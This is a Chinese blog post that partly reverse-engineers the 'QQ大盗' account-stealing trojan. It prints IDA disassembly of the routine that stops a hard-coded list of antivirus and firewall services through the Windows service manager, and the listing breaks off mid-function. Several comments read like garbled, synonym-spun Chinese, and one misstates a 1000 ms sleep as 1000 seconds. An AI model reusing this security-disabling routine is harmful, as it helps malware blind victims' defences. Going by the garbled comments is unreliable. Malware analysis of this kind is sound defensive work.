不完全逆向分析啊拉QQ大盗
啊拉QQ大盗有几个部分,大家看一下它的功能:
运行后关闭QQ,安装后删除自身,过滤重复号码,彻底干掉防火墙等等.其中我最感兴趣的还是看看啊拉QQ大盗是怎么干掉防火墙的,故挑了重点对它进行逆向分析.这个服务端是加了个壳.我对脱壳不太懂,所以叫冷血书生帮我脱了.废话少说,下面是反汇编代码:
; IDA listing excerpt (section ".shrink"). The argument is passed in eax:
; sub_4095FC stores eax into its local var_4 on entry (see its listing below).
; Each pair of lines loads the address of one hard-coded service-name string
; and calls sub_4095FC, which opens the SCM (OpenSCManagerA), opens the named
; service (OpenServiceA) and sends it ControlService with dwControl = 1
; (SERVICE_CONTROL_STOP). Defender note: this fixed list of AV / firewall
; service names is a useful static indicator for triage and detection rules.
; The names appear to belong to common AV / security products (e.g. Symantec
; "cc*"/"nav*" services, McAfee "Mc*" services, and "wscsvc" = Windows
; Security Center) -- verify per name before relying on the attribution.
.shrink:0040A0AA mov eax, offset s_Rsccenter ; "RsCCenter"
.shrink:0040A0AF call sub_4095FC ; stop the following AV / firewall services, one call per name
.shrink:0040A0AF
.shrink:0040A0B4 mov eax, offset s_Kvsrvxp ; "KVSrvXP"
.shrink:0040A0B9 call sub_4095FC
.shrink:0040A0B9
.shrink:0040A0BE mov eax, offset s_Kavsvc ; "kavsvc"
.shrink:0040A0C3 call sub_4095FC
.shrink:0040A0C3
.shrink:0040A0C8 mov eax, offset s_Kpfwsvc ; "KPfwSvc"
.shrink:0040A0CD call sub_4095FC
.shrink:0040A0CD
.shrink:0040A0D2 mov eax, offset s_Kwatchsvc ; "KWatchSvc"
.shrink:0040A0D7 call sub_4095FC
.shrink:0040A0D7
.shrink:0040A0DC mov eax, offset s_Wscsvc ; "wscsvc"
.shrink:0040A0E1 call sub_4095FC
.shrink:0040A0E1
.shrink:0040A0E6 mov eax, offset s_Sndsrvc ; "SNDSrvc"
.shrink:0040A0EB call sub_4095FC
.shrink:0040A0EB
.shrink:0040A0F0 mov eax, offset s_Ccproxy ; "ccProxy"
.shrink:0040A0F5 call sub_4095FC
.shrink:0040A0F5
.shrink:0040A0FA mov eax, offset s_Ccevtmgr ; "ccEvtMgr"
.shrink:0040A0FF call sub_4095FC
.shrink:0040A0FF
.shrink:0040A104 mov eax, offset s_Ccsetmgr ; "ccSetMgr"
.shrink:0040A109 call sub_4095FC
.shrink:0040A109
.shrink:0040A10E mov eax, offset s_Spbbcsvc ; "SPBBCSvc"
.shrink:0040A113 call sub_4095FC
.shrink:0040A113
.shrink:0040A118 mov eax, offset s_SymantecCoreL ; "Symantec Core LC"
.shrink:0040A11D call sub_4095FC
.shrink:0040A11D
.shrink:0040A122 mov eax, offset s_Navapsvc ; "navapsvc"
.shrink:0040A127 call sub_4095FC
.shrink:0040A127
.shrink:0040A12C mov eax, offset s_Npfmntor ; "NPFMntor"
.shrink:0040A131 call sub_4095FC
.shrink:0040A131
.shrink:0040A136 mov eax, offset s_Mskservice ; "MskService"
.shrink:0040A13B call sub_4095FC
.shrink:0040A13B
.shrink:0040A140 mov eax, offset s_Mctaskmanager ; "McTaskManager"
.shrink:0040A145 call sub_4095FC
.shrink:0040A145
.shrink:0040A14A mov eax, offset s_Mcshield ; "McShield"
.shrink:0040A14F call sub_4095FC
.shrink:0040A14F
.shrink:0040A154 mov eax, offset s_Mcafeeframewo ; "McAfeeFramework"
.shrink:0040A159 call sub_4095FC
.shrink:0040A159
.shrink:0040A15E
.shrink:0040A15E loc_40A15E: ; CODE XREF: .shrink:0040A16D j
.shrink:0040A15E call sub_409064 ; helper not shown in this excerpt; runs on every pass of the loop
.shrink:0040A15E
.shrink:0040A163 push 0BB8h ; dwMilliseconds = 0BB8h = 3000 (3 s)
.shrink:0040A168 call Sleep ; Sleep(3000) between passes
.shrink:0040A168
.shrink:0040A16D jmp short loc_40A15E ; unconditional back-edge: this loop never exits
.shrink:0040A16D
很明显,这里是把一个参数传递给sub_4095FC这个子程序,而这个参数正好是一些常见的杀毒软件服务名称.所以这个函数应该这样声明:char sub_4095FC(int buffer)(C语言语法).把这个名称传递给sub_4095FC干什么呢?大家请看sub_4095FC这个子程序:
.shrink:004095FC sub_4095FC proc near
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC var_4 = dword ptr -4 ;通报进来的参数
.shrink:004095FC
.shrink:004095FC push ebp
.shrink:004095FD mov ebp, esp
.shrink:004095FF push ecx
.shrink:00409600 push ebx
.shrink:00409601 push esi
.shrink:00409602 push edi
.shrink:00409603 mov [ebp+var_4], eax
.shrink:00409606 mov eax, [ebp+var_4]
.shrink:00409609 call sub_403ED0
.shrink:00409609
.shrink:0040960E xor eax, eax
.shrink:00409610 push ebp
.shrink:00409611 push offset s_SUIL_YN@ ; "榕瀄xFF\xFF腽嬅_^[Y]脥@" (这里已经被加密)
.shrink:00409616 push dword ptr fs:[eax]
.shrink:00409619 mov fs:[eax], esp
.shrink:0040961C mov eax, [ebp+var_4]
.shrink:0040961F call sub_403EE0
.shrink:0040961F
.shrink:00409624 mov esi, eax
.shrink:00409626 push 0F003Fh ; dwDesiredAccess
.shrink:0040962B push 0 ; lpDatabaseName
.shrink:0040962D push 0 ; lpMachineName
.shrink:0040962F call OpenSCManagerA ; 翻开服务办理器
.shrink:0040962F
.shrink:00409634 mov edi, eax ; 生存句柄到edi
.shrink:00409636 test edi, edi ; 是否翻开成功?
.shrink:00409638 jbe short loc_4096A8 ; 翻开成功,连续实行,反之跳到这里
.shrink:00409638
.shrink:0040963A push 0F01FFh ; dwDesiredAccess
.shrink:0040963F push esi ; lpServiceName
.shrink:00409640 push edi ; hSCManager
.shrink:00409641 call OpenServiceA ; 翻开一个防火墙的服务
.shrink:00409641
.shrink:00409646 mov esi, eax
.shrink:00409648 test esi, esi
.shrink:0040964A jbe short loc_4096A2 ; 翻开堕落 封闭句柄
.shrink:0040964A
.shrink:0040964C push offset ServiceStatus ; lpServiceStatus
.shrink:00409651 push 1 ; dwControl
.shrink:00409653 push esi ; hService
.shrink:00409654 call ControlService ; 制止人家的防火墙的服务
.shrink:00409654
.shrink:00409659 test eax, eax
.shrink:0040965B jz short loc_4096A8
.shrink:0040965B
.shrink:0040965D push 3E8h ; dwMilliseconds
.shrink:00409662 call Sleep ; 休眠1000秒
.shrink:00409662
.shrink:00409667 jmp short loc_40967C
.shrink:00409667
.shrink:00409669 ; ---------------------------------------------------------------------------
.shrink:00409669
.shrink:00409669 loc_409669:
.shrink:00409669 cmp ServiceStatus.dwCurrentState,3 ;是否是SERVICE_STOP_PENDING形态
.shrink:00409670 jnz short loc_40968B
.shrink:00409670
.shrink:00409672 push 3E8h ; dwMilliseconds
.shrink:00409677 call Sleep ;休眠
.shrink:00409677
.shrink:0040967C
- 文章作者: 福州军威计算机技术有限公司
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。